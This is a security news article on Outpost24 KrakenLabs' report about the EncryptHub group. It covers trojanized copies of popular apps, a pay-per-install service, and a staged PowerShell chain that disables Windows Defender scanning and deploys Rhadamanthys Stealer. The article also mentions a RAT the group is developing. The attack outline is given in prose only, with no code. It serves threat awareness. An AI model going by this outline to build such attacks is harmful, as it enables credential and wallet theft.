Beware of Trojanized Apps: EncryptHub Targets Cryptocurrency Wallets and Corporate Networks
do son 
EncryptHub’s diamond model diagram | Image: Outpost24
A newly cybercriminal entity, EncryptHub, has gained attention from multiple threat intelligence teams, including Outpost24’s KrakenLabs. Their latest report exposes EncryptHub’s intricate multi-stage attack chain, reliance on trojanized applications, and a growing remote access tool (RAT) that may soon be commercialized in underground markets.
While prior analyses have shed light on this cybercriminal entity, KrakenLabs’ deep dive uncovers “previously unseen aspects of their infrastructure, tooling, and behavioral patterns“. The researchers reveal that EncryptHub made operational security (OPSEC) mistakes, inadvertently exposing critical parts of its ecosystem, including directory listings, stealer logs, and Telegram bot configurations used for data exfiltration and campaign tracking. These missteps provided an unprecedented opportunity to dissect EncryptHub’s methodologies, painting a clearer picture of their operations.
EncryptHub employs a combination of classic and emerging malware distribution techniques, including:
- Trojanized software – EncryptHub disguises malware inside fake versions of popular applications, including QQ Talk, WeChat, DingTalk, Google Meet, and Palo Alto GlobalProtect.
- Pay-Per-Install (PPI) services – The group partners with LabInstalls, an underground service that automates malware distribution via a Telegram bot.
- Credential prioritization – Stolen credentials are categorized based on their value, with particular interest in cryptocurrency wallets, corporate networks, and VPN users.
Once a victim installs a trojanized application, EncryptHub’s malware deploys in a multi-stage killchain, beginning with PowerShell scripts that gather system information, steal credentials, and execute additional payloads.
- Stage 1: A PowerShell script, worker.ps1, collects system details (e.g., username, location, OS version) and forwards the data to a Command-and-Control (C2) server.
- Stage 2: The malware downloads and runs runner.ps1, which decodes and executes embedded files, using Microsoft Common Console (.msc) tricks to evade detection.
- Stage 3: The system is instructed to disable Windows Defender scanning for specific folders, reducing the likelihood of malware detection.
- Stage 4: A final payload deploys Rhadamanthys Stealer, an advanced information stealer targeting passwords, browser cookies, cryptocurrency wallets, and VPN sessions.
EncryptHub is developing EncryptRAT, a remote access tool (RAT) with a C2 panel that allows attackers to:
- Manage infections
- Remotely execute commands
- Download stolen data
- Configure malware samples
Early indications suggest EncryptHub may commercialize EncryptRAT by selling it to other cybercriminals.
EncryptHub’s rapid evolution signals a growing threat to enterprises and individual users alike. Their tactics highlight a dangerous intersection between malware development and underground services that make it easier for cybercriminals to scale their attacks.
Organizations are advised to remain vigilant, monitor for malicious activity, and ensure their endpoint security solutions are up-to-date.
As KrakenLabs warns, this is only the first part of their investigation, with further findings expected to reveal even more surprises about EncryptHub’s cybercriminal activities.
